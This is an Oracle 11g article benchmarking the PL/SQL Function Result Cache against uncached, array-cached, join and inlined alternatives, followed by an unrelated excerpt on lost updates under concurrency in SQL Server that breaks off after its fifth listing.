The Function Result Cache is a key performance enhancement in 11g. For the remainder of this article, we will examine its performance characteristics and attempt to draw some conclusions for when it might or might not be an appropriate tool to use. Our performance tests will fall into one of two broad categories that describe the way we create and use PL/SQL functions in our applications, as follows:

  • PL/SQL functions containing SQL; and
  • PL/SQL functions with PL/SQL logic (i.e. no SQL).

Within each broad category, we will also distinguish between PL/SQL functions called from SQL statements and those called from within PL/SQL programs.

a note on performance measurement

Our performance tests will use Tom Kyte’s Runstats utility and a TIMER package to compare the timings and resource usage of result cache with “traditional” application methods. We will be using either the SH.SALES table (over 900,000 rows), an inflated SH.CUSTOMERS table (over 550,000 rows) or 1,000,000 PL/SQL loop iterations for our tests. We will enable Autotrace for the SQL examples to reduce the screen output and report on I/O statistics. Finally, it is important to note that we will run all SQL testcases twice to mitigate the effects of physical I/O. We will flush the result cache after the first run and report on the second execution only below, validating the “fairness” of the tests with the Autotrace statistics reports.

performance (1): result cache functions with sql lookups

We will begin our performance tests by comparing various methods of looking up reference data from within PL/SQL functions. This is the area that the Function Result Cache is primarily targetting, so we will perform four comparisons as follows.

Test Description
1a Runstats comparison of uncached and result cache lookup functions called from SQL.
1b Runstats comparison of result cache and user-cached lookup functions called from SQL.
1c Runstats comparison of result cache lookup function called from SQL and a SQL join.
1d Timer comparison of uncached, result cache and user-cached lookup functions called in PL/SQL.

performance (1): test package

For the “SQL in PL/SQL” tests, will create a test package of lookup functions, as follows.

SQL> CREATE PACKAGE cache_test AS
  2
  3     FUNCTION result_cache_prod_lookup(
  4              p_id IN products.prod_id%TYPE
  5              ) RETURN products.prod_desc%TYPE
  6                RESULT_CACHE;
  7
  8     FUNCTION user_cache_prod_lookup(
  9              p_id IN products.prod_id%TYPE
 10              ) RETURN products.prod_desc%TYPE;
 11
 12     FUNCTION no_cache_prod_lookup(
 13              p_id IN products.prod_id%TYPE
 14              ) RETURN products.prod_desc%TYPE;
 15
 16  END cache_test;
 17  /

Package created.

The function names are reasonably descriptive. We will be comparing the result cache to PL/SQL functions with either array-based caching or no caching at all. The package body is as follows.

SQL> CREATE PACKAGE BODY cache_test AS
  2
  3     TYPE prod_cache_aat IS TABLE OF products.prod_desc%TYPE
  4        INDEX BY PLS_INTEGER;
  5     g_prod_cache prod_cache_aat;
  6
  7     -------------------------------------------------------
  8     FUNCTION result_cache_prod_lookup(
  9              p_id IN products.prod_id%TYPE
 10              ) RETURN products.prod_desc%TYPE
 11                RESULT_CACHE
 12                RELIES_ON (products) IS
 13        v_desc products.prod_desc%TYPE;
 14     BEGIN
 15        SELECT prod_desc INTO v_desc
 16        FROM   products
 17        WHERE  prod_id = p_id;
 18        RETURN v_desc;
 19     END result_cache_prod_lookup;
 20
 21     -------------------------------------------------------
 22     FUNCTION no_cache_prod_lookup(
 23              p_id IN products.prod_id%TYPE
 24              ) RETURN products.prod_desc%TYPE IS
 25        v_desc products.prod_desc%TYPE;
 26     BEGIN
 27        SELECT prod_desc INTO v_desc
 28        FROM   products
 29        WHERE  prod_id = p_id;
 30        RETURN v_desc;
 31     END no_cache_prod_lookup;
 32
 33     -------------------------------------------------------
 34     FUNCTION user_cache_prod_lookup(
 35              p_id IN products.prod_id%TYPE
 36              ) RETURN products.prod_desc%TYPE IS
 37     BEGIN
 38        IF NOT g_prod_cache.EXISTS(p_id) THEN
 39           SELECT prod_desc INTO g_prod_cache(p_id)
 40           FROM   products
 41           WHERE  prod_id = p_id;
 42        END IF;
 43        RETURN g_prod_cache(p_id);
 44     END user_cache_prod_lookup;
 45
 46  END cache_test;
 47  /

Package body created.

These are all standard techniques for looking up reference data from the database. We will now proceed with our first comparison.

comparison 1a: uncached and result cache functions from sql

Our first test will be to compare the performance of the result cache to a PL/SQL lookup function without any caching, called from SQL. We will start the Runstats utility and call the uncached function, as follows.

SQL> set autotrace traceonly statistics

SQL> exec runstats_pkg.rs_start();

PL/SQL procedure successfully completed.

SQL> SELECT s.*
  2  ,      cache_test.no_cache_prod_lookup(s.prod_id) AS prod_desc
  3  FROM   sales s;

918843 rows selected.

Statistics
----------------------------------------------------------
     918883  recursive calls
          0  db block gets
    1841307  consistent gets
          0  physical reads
          0  redo size
   26120009  bytes sent via SQL*Net to client
      20623  bytes received via SQL*Net from client
       1839  SQL*Net roundtrips to/from client
          0  sorts (memory)
          0  sorts (disk)
     918843  rows processed

This is an expensive (but quite common) way of looking up reference data. We can see in the Autotrace report that there are approximately two LIOs per row and an enormous number of recursive calls. We will now run the same SALES query but using the Function Result Cache, as follows.

SQL> exec runstats_pkg.rs_middle();

PL/SQL procedure successfully completed.

SQL> SELECT s.*
  2  ,      cache_test.result_cache_prod_lookup(s.prod_id) AS prod_desc
  3  FROM   sales s;

918843 rows selected.

Statistics
----------------------------------------------------------
         75  recursive calls
          0  db block gets
       3705  consistent gets
          0  physical reads
          0  redo size
   26120009  bytes sent via SQL*Net to client
      20623  bytes received via SQL*Net from client
       1839  SQL*Net roundtrips to/from client
          0  sorts (memory)
          0  sorts (disk)
     918843  rows processed

We can see a dramatic reduction in the LIOs and recursive SQL for this method. This should translate to a good time saving. We will output the major differences between the two methods with the Runstats report, as follows.

SQL> exec runstats_pkg.rs_stop(1000);

Run1 ran in 5707 hsecs Run2 ran in 1528 hsecs Run1 ran in 373.49% of the time

Name                                  Run1        Run2        Diff
STAT..recursive cpu usage            3,209           5      -3,204
STAT..CPU used by this session       5,204         881      -4,323
STAT..CPU used when call start       5,208         881      -4,327
STAT..DB time                        5,214         879      -4,335
LATCH.transaction allocation         9,555           1      -9,554
LATCH.DML lock allocation           42,313           1     -42,312
STAT..session pga memory          -786,432           0     786,432
STAT..calls to kcmgrs              918,843         144    -918,699
STAT..index fetch by key           918,844          74    -918,770
STAT..rows fetched via callbac     918,844          74    -918,770
STAT..opened cursors cumulativ     918,856          77    -918,779
STAT..session cursor cache hit     918,855          75    -918,780
STAT..table fetch by rowid         918,856          74    -918,782
STAT..calls to get snapshot sc     918,962         175    -918,787
STAT..execute count                918,865          77    -918,788
STAT..recursive calls              919,853       1,045    -918,808
LATCH.shared pool simulator        922,743       3,813    -918,930
STAT..consistent gets - examin   1,837,709         150  -1,837,559
STAT..consistent gets            1,841,310       3,711  -1,837,599
STAT..consistent gets from cac   1,841,310       3,711  -1,837,599
STAT..session logical reads      1,841,310       3,711  -1,837,599
LATCH.Result Cache: Latch                0   1,837,830   1,837,830
LATCH.cache buffers chains       1,841,775       3,766  -1,838,009
STAT..buffer is not pinned cou   2,756,583         220  -2,756,363

Run1 latches total versus run2 -- difference and pct
        Run1        Run2        Diff        Pct
   2,827,747   1,852,820    -974,927    152.62%

PL/SQL procedure successfully completed.

We can see a lot of differences in the report, most of them generated by the uncached function, which took almost four times as long as the result cache method. With the exception of the new Result Cache: Latch, the Function Result Cache saved us a considerable amount of time and resources (particularly I/O but also some latching). To complete this test, we will look at the result cache statistics, as follows.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                  80
Find Count 918823

2 rows selected.

We can see that most of our Function Result Cache data was served from the cache. The create count is insignificant compared with the number of hits and the I/O savings are impressive.

Back to Performance Tests

comparison 1b: result cache and user-cached functions from sql

Using the same method as the previous test, we will now compare the Function Result Cache with an array-based cache. User-defined array caches are quite common and can provide some good performance gains for PL/SQL programs, but as stated earlier, they are quite difficult to keep consistent with the database and are not shared. We expect, however, to see similar performance to the Function Result Cache, which we will use to begin the test, as follows.

SQL> exec runstats_pkg.rs_start();

PL/SQL procedure successfully completed.

SQL> SELECT s.*
  2  ,      cache_test.result_cache_prod_lookup(s.prod_id) AS prod_desc
  3  FROM   sales s;

918843 rows selected.

<< ...autotrace report omitted... >>

The Autotrace report is roughly the same as for the previous result cache example, so has been omitted. We will now repeat the query but using the user-cache.

SQL> exec runstats_pkg.rs_middle();

PL/SQL procedure successfully completed.

SQL> SELECT s.*
  2  ,      cache_test.user_cache_prod_lookup(s.prod_id) AS prod_desc
  3  FROM   sales s;

918843 rows selected.

<< ...autotrace report omitted... >>

The Autotrace report shows no significant differences to the Function Result Cache, so it has been omitted. We will now compare the methods with the Runstats report, as follows.

SQL> exec runstats_pkg.rs_stop(1000);

Run1 ran in 1539 hsecs Run2 ran in 1441 hsecs Run1 ran in 106.8% of the time

Name                                  Run1        Run2        Diff
LATCH.transaction allocation         9,555           1      -9,554
LATCH.DML lock allocation           42,313           1     -42,312
STAT..session pga memory           196,608     393,216     196,608
STAT..session pga memory max             0     262,144     262,144
LATCH.Result Cache: Latch        1,837,686           0  -1,837,686

Run1 latches total versus run2 -- difference and pct
        Run1        Run2        Diff        Pct
   1,907,206      15,943  -1,891,263 11,962.65%

PL/SQL procedure successfully completed.

We can see that these methods provide similar performance. The user-cache is slightly quicker over the entire resultset and the only major difference between the two methods is the latching incurred by the Function Result Cache. Remember that the user-cache method has incurred over 900,000 function calls, while the result cache method has incurred 0 at this stage. To complete this investigation, we will run our statistics report for the last time in this article, as follows.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                  80
Find Count 1837666

2 rows selected.

We incurred no function calls at all with the result cache method, as suspected.

We can deduce from this that the elapsed time of one result cache lookup is roughly equivalent to the elapsed time of the context switching between SQL and PL/SQL to execute a single function call. Despite this, the additional “cost” of the Function Result Cache is probably worth bearing for the benefits it provides (such as cross-session availability and cache consistency).

Back to Performance Tests

comparison 1c: result cache function and join from sql

Cached lookups are a performant method for single-row lookups when encapsulating reference tables and we have seen this in the comparisons above. However, the most efficient method of retrieving reference data is usually via a join to the lookup table itself. We will therefore compare the Function Result Cache with a straight join to the PRODUCTS table, starting with the cache method, as follows.

SQL> exec runstats_pkg.rs_start();

PL/SQL procedure successfully completed.

SQL> SELECT s.*
  2  ,      cache_test.result_cache_prod_lookup(s.prod_id) AS prod_desc
  3  FROM   sales s;

918843 rows selected.

<< ...autotrace report omitted... >>

Again, we have just over 3,500 consistent gets using the Function Result Cache for this query, so the Autotrace report has been omitted. We will now change the SALES query to join directly to PRODUCTS to avoid any PL/SQL function usage, as follows.

SQL> exec runstats_pkg.rs_middle();

PL/SQL procedure successfully completed.

SQL> SELECT s.*
  2  ,      p.prod_desc
  3  FROM   sales    s
  4  ,      products p
  5  WHERE  s.prod_id = p.prod_id;

918843 rows selected.

Statistics
----------------------------------------------------------
         40  recursive calls
          0  db block gets
       3577  consistent gets
          2  physical reads
          0  redo size
   26120009  bytes sent via SQL*Net to client
      20623  bytes received via SQL*Net from client
       1839  SQL*Net roundtrips to/from client
          4  sorts (memory)
          0  sorts (disk)
     918843  rows processed

The I/O resources used for this query are similar to the Function Result Cache method. We will output the timings and resource usage with the Runstats report, as follows.

SQL> exec runstats_pkg.rs_stop(1000);

Run1 ran in 1536 hsecs Run2 ran in 844 hsecs Run1 ran in 181.99% of the time

Name                                  Run1        Run2        Diff
LATCH.shared pool simulator          5,532          49      -5,483
STAT..session uga memory             7,488           0      -7,488
STAT..session uga memory max             0       7,488       7,488
STAT..physical read bytes                0      16,384      16,384
STAT..physical read total byte           0      16,384      16,384
STAT..session pga memory            65,536     131,072      65,536
LATCH.Result Cache: Latch        1,837,686           0  -1,837,686

Run1 latches total versus run2 -- difference and pct
        Run1        Run2        Diff        Pct
   1,852,610       9,747  -1,842,863 19,006.98%

PL/SQL procedure successfully completed.

The SQL join method is significantly faster (almost twice as fast) and incurs much less latching. The Result Cache: Latch statistic is again the biggest difference. We can conclude therefore that the general advice has not changed in 11g: we should continue to use SQL to join directly to our reference tables if we demand performance over encapsulation.

Back to Performance Tests

comparison 1d: uncached, result cache and user-cached functions from pl/sql

Our first three tests have compared the performance of lookups from SQL. We will now compare the timings of our three PL/SQL functions from within PL/SQL itself, again using the SALES table as the source of our lookup keys. This is broadly equivalent to many PL/SQL load routines that fetch data then use numerous function calls to transform it according to local business rules. Note that we will only report “wall-clock” timings below for convenience.

SQL> DECLARE
  2
  3     v_desc products.prod_desc%TYPE;
  4
  5  BEGIN
  6
  7     timer.snap();
  8     FOR r IN (SELECT s.prod_id FROM sales s) LOOP
  9        v_desc := cache_test.no_cache_prod_lookup(r.prod_id);
 10     END LOOP;
 11     timer.show('Not Cached  ');
 12
 13     timer.snap();
 14     FOR r IN (SELECT s.prod_id FROM sales s) LOOP
 15        v_desc := cache_test.user_cache_prod_lookup(r.prod_id);
 16     END LOOP;
 17     timer.show('User Cache  ');
 18
 19     timer.snap();
 20     FOR r IN (SELECT s.prod_id FROM sales s) LOOP
 21        v_desc := cache_test.result_cache_prod_lookup(r.prod_id);
 22     END LOOP;
 23     timer.show('Result Cache');
 24
 25  END LOOP;
 26  /

[Not Cached ] 42.91 seconds [User Cache ] 1.78 seconds [Result Cache] 2.16 seconds

PL/SQL procedure successfully completed.

These timings highlight some interesting facts. First, the caching methods are significantly faster than the uncached method (as expected) but are roughly comparable to each other. As with our previous SQL example, the array-cache method is slightly quicker overall. Second, the Function Result Cache appears to be much faster when used from within PL/SQL, but this is largely due to the massive reduction in SQL*Net traffic generated by the PL/SQL fetches (there is no client as such in this example, unlike the SQL examples above). We have also used a smaller column projection (of just one column) in the PL/SQL code.

We can conclude from these results that the same general principles apply to the performance of PL/SQL functions under different caching scenarios, regardless of whether they are called from SQL or PL/SQL code.

Back to Performance Tests

performance (2): result cache functions with pl/sql logic

So far we have looked at the result cache performance for PL/SQL functions with embedded SQL lookups. For the remaining performance investigations, we will concentrate on PL/SQL functions comprising PL/SQL-only logic (i.e. no SQL statements). Our tests are listed below and include function calls from SQL and PL/SQL as before. These will enable us to determine whether the practice of encapsulating business rules in PL/SQL functions is enhanced by the Function Result Cache.

Test Description
2a Runstats comparison of uncached and result cache PL/SQL-only functions called from SQL.
2b Runstats comparison of result cache function and inlined business logic called from SQL.
2c Timer comparison of PL/SQL-only function calls (uncached and result cache) with inlined logic in PL/SQL.

performance test package (2)

For the “PL/SQL-logic-only” comparisons, will create a test package of two business rule functions: one using the result cache and one without any caching. We will return to a couple of variations on our FORMAT_CUSTOMER_NAME function from earlier in the article, as follows.

SQL> CREATE OR REPLACE PACKAGE cache_test AS
  2
  3     FUNCTION result_cache_cust_name(
  4              p_first_name IN VARCHAR2,
  5              p_last_name  IN VARCHAR2
  6              ) RETURN VARCHAR2
  7                RESULT_CACHE;
  8
  9     FUNCTION no_cache_cust_name(
 10              p_first_name IN VARCHAR2,
 11              p_last_name  IN VARCHAR2
 12              ) RETURN VARCHAR2;
 13
 14  END cache_test;
 15  /

Package created.

The functions will construct a customer name from the supplied parameters. We create the package body as follows.

SQL> CREATE OR REPLACE PACKAGE BODY cache_test AS
  2
  3     -------------------------------------------------------
  4     FUNCTION result_cache_cust_name(
  5              p_first_name IN VARCHAR2,
  6              p_last_name  IN VARCHAR2
  7              ) RETURN VARCHAR2
  8                RESULT_CACHE
  9                RELIES_ON (customers) IS
 10     BEGIN
 11        RETURN p_first_name || ' ' || p_last_name;
 12     END result_cache_cust_name;
 13
 14     -------------------------------------------------------
 15     FUNCTION no_cache_cust_name(
 16              p_first_name IN VARCHAR2,
 17              p_last_name  IN VARCHAR2
 18              ) RETURN VARCHAR2 IS
 19     BEGIN
 20        RETURN p_first_name || ' ' || p_last_name;
 21     END no_cache_cust_name;
 22
 23  END cache_test;
 24  /

Package body created.

comparison 2a: uncached and result cache functions from sql

We will begin by using Runstats to compare the two packaged functions when called from a large CUSTOMERS dataset of over 550,000 rows. We will use a Cartesian Product to inflate the resultset, starting with the uncached function as follows.

SQL> set autotrace traceonly statistics

SQL> exec runstats_pkg.rs_start();

PL/SQL procedure successfully completed.

SQL> SELECT c.*
  2  ,      cache_test.no_cache_cust_name(
  3            c.cust_first_name, c.cust_last_name
  4            ) AS cust_name
  5  FROM   customers c
  6  ,     (SELECT ROWNUM FROM dual CONNECT BY ROWNUM <= 10) x;

555000 rows selected.

Statistics
----------------------------------------------------------
          0  recursive calls
          0  db block gets
       1477  consistent gets
          0  physical reads
          0  redo size
   61095910  bytes sent via SQL*Net to client
      12615  bytes received via SQL*Net from client
       1111  SQL*Net roundtrips to/from client
          2  sorts (memory)
          0  sorts (disk)
     555000  rows processed

We will now run a similar SQL statement but using the result cached version of the PL/SQL function, as follows.

SQL> exec runstats_pkg.rs_middle();

PL/SQL procedure successfully completed.

SQL> SELECT c.*
  2  ,      cache_test.result_cache_cust_name(
  3            c.cust_first_name, c.cust_last_name
  4            ) AS cust_name
  5  FROM   customers c
  6  ,     (SELECT ROWNUM FROM dual CONNECT BY ROWNUM <= 10) x;

555000 rows selected.

Statistics
----------------------------------------------------------
          0  recursive calls
          0  db block gets
       1477  consistent gets
          0  physical reads
          0  redo size
   61095910  bytes sent via SQL*Net to client
      12615  bytes received via SQL*Net from client
       1111  SQL*Net roundtrips to/from client
          2  sorts (memory)
          0  sorts (disk)
     555000  rows processed

We can see that the resource usage is the same. We will output the Runstats report to provide more detail, as follows.

SQL> exec runstats_pkg.rs_stop(1000);

Run1 ran in 1223 hsecs Run2 ran in 1353 hsecs Run1 ran in 90.39% of the time

Name                                  Run1        Run2        Diff
STAT..session uga memory             7,488           0      -7,488
STAT..session pga memory            65,536           0     -65,536
STAT..session uga memory max       130,928           0    -130,928
LATCH.Result Cache: Latch                0   1,110,000   1,110,000

Run1 latches total versus run2 -- difference and pct
        Run1        Run2        Diff        Pct
       7,665   1,117,709   1,110,044       .69%

PL/SQL procedure successfully completed.

This is an interesting result. The uncached PL/SQL-logic function is quicker to use from SQL than the result cached version. This means, therefore, that the internal Function Result Cache mechanism (primarily the latching and the lookup) is slower than general SQL->PL/SQL context switching (something we are constantly trying to reduce). Business rule encapsulation has not received any boost from the new feature in this respect.

Back to Performance Tests

comparison 2b: result cache function and inlined logic from sql

Our second test in this category will compare the Function Result Cache with inlined logic in SQL (we might refer to this as “hard-coded” logic). We will begin with the result cache method, as follows.

SQL> exec runstats_pkg.rs_start();

PL/SQL procedure successfully completed.

SQL> SELECT c.*
  2  ,      cache_test.result_cache_cust_name(
  3            c.cust_first_name, c.cust_last_name
  4            ) AS cust_name
  5  FROM   customers c
  6  ,     (SELECT ROWNUM FROM dual CONNECT BY ROWNUM <= 10) x;

555000 rows selected.

<< ...autotrace report omitted... >>

There are no suprises in the Autotrace report so it has been omitted. We will now run the SQL statement with inlined logic, as follows.

SQL> exec runstats_pkg.rs_middle();

PL/SQL procedure successfully completed.

SQL> SELECT c.*
  2  ,      c.cust_first_name || ' ' || c.cust_last_name AS cust_name
  3  FROM   customers c
  4  ,     (SELECT ROWNUM FROM dual CONNECT BY ROWNUM <= 10) x;

555000 rows selected.

<< ...autotrace report omitted... >>

Again, there are no differences in the Autotrace report. We will complete the test by running the Runstats report, as follows.

SQL> exec runstats_pkg.rs_stop(1000);

Run1 ran in 1361 hsecs Run2 ran in 850 hsecs Run1 ran in 160.12% of the time

Name                                  Run1        Run2        Diff
LATCH.shared pool simulator          2,254          27      -2,227
STAT..session uga memory             7,488           0      -7,488
STAT..session pga memory            65,536     131,072      65,536
STAT..session pga memory max             0     131,072     131,072
LATCH.Result Cache: Latch        1,110,000           0  -1,110,000

Run1 latches total versus run2 -- difference and pct
        Run1        Run2        Diff        Pct
   1,118,370       5,318  -1,113,052 21,029.90%

PL/SQL procedure successfully completed.

The inlined-logic method is considerably faster than any method that uses PL/SQL functions. We can see this in the timings for both this test and the previous test. Unfortunately, the Function Result Cache mechanism alone does not mitigate the costs associated with PL/SQL encapsulation: it simply cannot match the performance of SQL.

Back to Performance Tests

comparison 2c: uncached function, result cache function and inlined logic in pl/sql

To complete our performance investigations, we will compare the timings of the uncached, result cached and inlined methods from within PL/SQL. We will not be executing any SQL in the timed tests. In the following PL/SQL block, we will fetch 1,000 customers up-front, then perform 1,000,000 iterations for each method, using the “wall-clock” as a proxy measure of performance.

SQL> DECLARE
  2
  3     v_cust_name   VARCHAR2(4000);
  4     v_first_names DBMS_SQL.VARCHAR2_TABLE;
  5     v_last_names  DBMS_SQL.VARCHAR2_TABLE;
  6     v_loop        PLS_INTEGER := 1000;
  7
  8  BEGIN
  9
 10     SELECT cust_first_name, cust_last_name
 11     BULK   COLLECT INTO v_first_names, v_last_names
 12     FROM   customers
 13     WHERE  ROWNUM <= 1000;
 14
 15     timer.snap();
 16     FOR i IN 1 .. v_first_names.COUNT LOOP
 17        FOR ii IN 1 .. v_loop LOOP
 18           v_cust_name := cache_test.no_cache_cust_name(
 19                             v_first_names(i), v_last_names(i)
 20                             );
 21        END LOOP;
 22     END LOOP;
 23     timer.show('Not Cached    ');
 24
 25     timer.snap();
 26     FOR i IN 1 .. v_first_names.COUNT LOOP
 27        FOR ii IN 1 .. v_loop LOOP
 28           v_cust_name := cache_test.result_cache_cust_name(
 29                             v_first_names(i), v_last_names(i)
 30                             );
 31        END LOOP;
 32     END LOOP;
 33     timer.show('Result Cache  ');
 34
 35     timer.snap();
 36     FOR i IN 1 .. v_first_names.COUNT LOOP
 37        FOR ii IN 1 .. v_loop LOOP
 38           v_cust_name := v_first_names(i) || ' ' || v_last_names(i);
 39        END LOOP;
 40     END LOOP;
 41     timer.show('Inlined       ');
 42
 43  END LOOP;
 44  /

[Not Cached ] 0.69 seconds [Result Cache ] 1.68 seconds [Inlined ] 0.24 seconds

PL/SQL procedure successfully completed.

We can see clearly that we are penalised for using the Function Result Cache. The inlined logic is considerably quicker than any method involving function calls (subprogram inlining is a new feature of the PL/SQL optimising compiler in 11g), but the uncached version is over twice as fast as the result cached function.

Back to Performance Tests

conclusions

In this article we have examined the Function Result Cache mechanism and compared its performance to common alternatives. From the examples and performance results, we can conclude the following usage guidelines:

  • we can achieve the best performance gains by converting functions that contain SQL lookups to use the result cache. The greater the function’s workload, the greater the performance benefit when using the cache;
  • result cache lookups are no faster than PL/SQL function calls or context switches. If the function’s workload is trivial (and does not involve SQL), then it is not worth converting the function to use the result cache;
  • for trivial PL/SQL-only functions used within PL/SQL programs, subprogram inlining is a better performance feature to use. We should only consider the Function Result Cache when the time it takes to process the function’s logic is longer than the time spent in the result cache mechanism itself;
  • associative array caches are slightly faster to access than the Function Result Cache. However, the benefits of the Function Result Cache (such as one instance of the results, cross-session availability, Oracle-managed SGA memory and protected data integrity) far outweigh the minor time savings we can achieve by coding our own array caches.

further reading

For more information on the Cross-Session PL/SQL Function Result Cache, particularly its restrictions, read the PL/SQL Language Reference. For more links, including several blogs on the Result Cache Latch by Pythian, see this section of the background reading referenced earlier. The utilities used in this article (Timer, Counter and a version of Tom Kyte’s Runstats) are available on the Utilities page of oracle-developer.net.

source code

The source code for the examples in this article can be downloaded from here.

Adrian Billington, January 2008 (updated June 2010)

Developing Modifications that Survive Concurrency

Developing Modifications that Survive Concurrency
22 June 2010
by Alex Kuznetsov

(From http://www.simple-talk.com/sql/t-sql-programming/developing-modifications-that-survive-concurrency/)
You can create a database under the assumption that SQL looks after all the problems of concurrency. It will probably work fine under test conditions: Then, in the production environment, it starts losing data in subtle ways that defy repetition. It is every Database Developer’s nightmare. In an excerpt from his acclaimed book, Alex explains why it happens, and how you can avoid such problems.

Just like queries, modifications that work perfectly well in the isolated world of the test database, can suddenly start misbehaving, intermittently, when run in a production environment, under conditions of concurrent access. There are a number of different problems that might occur when “competing” connections try to simultaneously update the same data, some of the most common of which are:

•Lost modifications, a.k.a. lost updates – such problems occur when modifications performed by one connection are overwritten by another. Typically such problems occur silently; no errors are raised.
•Resource contention errors – such as deadlocks and lock timeouts
•Primary key and unique constraint violations – such problems occur when different modifications attempt to insert one and the same row.
The sort of situation in which a lost update or another error can occur, in other words when the result of the operation is dependent on the sequence or timing of other events, is known as a race condition. It is the job of the defensive programmer to guard against potential race conditions in their software. The most common solutions for such problems include:

•Serializing modifications against the same data, so that race conditions do not occur.
•Detecting and handling errors caused by concurrency
•Rewriting code so that it better withstands race conditions or avoids them altogether.
We shall discuss a few, all-too-common, examples that demonstrate the sort of problems that can arise, and then show different ways of solving them. Of course, it is possible that the problems that you encounter with concurrent modifications will be different from those described here. However, the basic approaches described for solving such problems are very likely to be useful in your situation.

Understanding Lost Modifications
Lost modifications can occur when multiple connections modify the same row of data. For example, one connection (A) reads a row of data, with the intent to update that row, based on certain criteria. Meanwhile after A has read the data, but before it updates it, a second connection (B) updates the same row. Connection A then performs its update, potentially causing the update made by B t be ‘lost’.

The classic example of a lost update involves reading data into a user form, for subsequent modification. For example, an employee loads into a user form, data pertaining to a particular customer, in order to update their address. Meanwhile, an automated process updates the same row, assigning to the customer a new status, such as “loyal customer”. If the employee submits the address update and the application updates the whole row, rather than the column that was changed, then the customer could be rest back to their old status, and the effect of the automated process will be lost.

Aside from having a more intelligent logic attached to the form, so only the column modified is updated in the database (we’ll discuss this in more detail shortly), there are essentially two concurrency control approaches that we can use in order to avoid such ‘lost updates’:

Optimistic approach: even though we have selected a row, other sessions can modify it, but we optimistically assume that this will not happen. When the selected row is updated, we have logic in place that will test to see if the row has been modified by someone else, since it was queried. If it has, then the employee would get a message saying that the row has been changed, and asking if we still want to make the requested change. This approach is preferable when selected rows are rarely modified, or when a typical modification takes a lot of time, such as modifying data via on-screen forms.

Pessimistic approach: Here, we pessimistically assume that rows will get modified by another process, between reading them and updating them, unless we do something to prevent it. When the employee selects a row, or list of rows, the system makes sure that nobody else can modify those rows. With this approach, he automated process would be blocked until the employee had made the address update (and we’d need logic in place to allow it to retry). This approach is most useful when selected rows are very likely to be modified and/or the modification does not take much time. Typically this approach is not used when users modify data via on-screen forms.

In the example we’ve used here, the two modifying transactions do not, from the database’s perspective, overlap. The automated update starts and finishes before the employee’s address update has started. In such circumstances, and given user forms are involved, we’re likely to take an optimistic approach to concurrency control.

In cases where only automated processes involved, where we have quick transactions attempting to (almost) simultaneously change the same rows of data, we are also in risk of lost updates, and are likely to adopt a pessimistic approach to concurrency control, in order to avoid them.

Let’s take a look at some fairly typical examples of when a ‘lost update’ can occur.

Non-overlapping Modifications
From the point of view of the database engine, the modifications in this example do not overlap; they occur at different times. Still, the second modification overwrites the changes made by the first one, and some information is lost.

Suppose that a ticket has been created in our bug tracking system to report that a very important business report for our Californian office has suddenly stopped working. Listing 1 shows the table that stores tickets. We have already used a table named Tickets in previous chapters of my book; make sure to create a new database to run the examples, or, at the very least, make sure to drop the table Tickets if it exists.

CREATE TABLE dbo.Tickets

(

TicketID INT NOT NULL ,

Problem VARCHAR(50) NOT NULL ,

CausedBy VARCHAR(50) NULL ,

ProposedSolution VARCHAR(50) NULL ,

AssignedTo VARCHAR(50) NOT NULL ,

Status VARCHAR(50) NOT NULL ,

CONSTRAINT PK_Tickets PRIMARY KEY ( TicketID )

) ;

Listing 1: Creating the dbo.Tickets table

Of course, in real life this table would have more columns, such as Priority, and possibly some columns would have different types, and there would be some constraints. However, as usual in this book all the details that are not relevant to this simple example are omitted. Listing 2 shows the ticket that was created.

INSERT INTO dbo.Tickets

( TicketID ,

Problem ,

CausedBy ,

ProposedSolution ,

AssignedTo ,

Status

)

VALUES ( 123 ,

‘TPS report for California not working’ ,

NULL ,

NULL ,

‘TPS report team’ ,

‘Opened’

) ;

Listing 2: The ticket in dbo.Tickets table, reporting a problem with the TPS report

This is a very important ticket, so two developers – let’s call them Arne and Brian – immediately start troubleshooting. Brian starts the bug tracking GUI and opens the ticket. In the meantime, Arne starts his investigation and quickly realizes that one of the tables used in the report is empty; possibly it has been accidentally truncated. He opens the same ticket in his on-screen form in the bug-tracking GUI and immediately updates the ticket, describing the likely cause of the problem. He also reassigns the ticket to the DBA team. The resulting SQL is shown in Listing 3

– Arnie loads data into form

SELECT TicketID ,

Problem ,

CausedBy ,

ProposedSolution ,

AssignedTo ,

Status

FROM dbo.Tickets

WHERE TicketID = 123

GO

– Arnie updates the form

BEGIN TRAN ;

UPDATE dbo.Tickets

SET AssignedTo = ‘DBA team’ ,

CausedBy = ‘The dbo.Customers table is empty’ ,

Problem = ‘TPS report for California not working’ ,

ProposedSolution =

‘Restore dbo.Customers table from backup’

WHERE TicketID = 123 ;

COMMIT ;

Listing 3: The SQL that was issued by Arne’s bug tracking form

Meanwhile, Brian decided to start by ascertaining whether it was just the report that had failed, or whether it was also affecting their Ohio office. He runs the report for Ohio and gets the same problem so, from his onscreen view of the ticket, which he opened before Arne made his update, Brian updates the Problem field to reflect this. The resulting SQL is shown in Listing 4.

–Brian updates the form

BEGIN TRAN ;

UPDATE dbo.Tickets

SET AssignedTo = ‘TPS report team’ ,

CausedBy = NULL ,

Problem =

‘TPS report for California and Ohio not working’ ,

ProposedSolution = NULL

WHERE TicketID = 123 ;

COMMIT ;

Listing 4: The SQL that was issued by Brian’s bug tracking form
The changes saved by Arne were completely lost. Clearly, our bug tracking system is susceptible to lost updates, and so has a big problem. There are two approaches to this issue that we must consider in order to prevent the lost update:

•Writing logic into the client/data access layer so that only columns are updated in the database, not the entire row
•Using concurrency control logic
•Let’s consider each in turn.
Only Updating Changed Columns
In this simple example, the problem is pretty blatant: the SQL generated by the user form updates all the fields from the screen, not just the one Problem field that Brian modified. In this case, the problem could be solved by designing a better data access layer that only updates those columns that were modified in the form.

Nevertheless, this is only a partial solution and will not be adequate in every case. If Brian, in addition, to recording that the TPS report for Ohio was also not working, had suggested as interim solution such as, “temporarily expose yesterday’s TPS report”, then Arne’s much more sensible solution would have been overwritten, regardless.

UPDATE dbo.Tickets

SET Problem =
‘TPS report for California and Ohio not working’ ,

ProposedSolution =
‘Expose yesterdays” TPS report instead of live one’

WHERE TicketID = 123 ;

Listing 5: Brian proposes a poor solution, overwrites a much better one suggested by Arne.

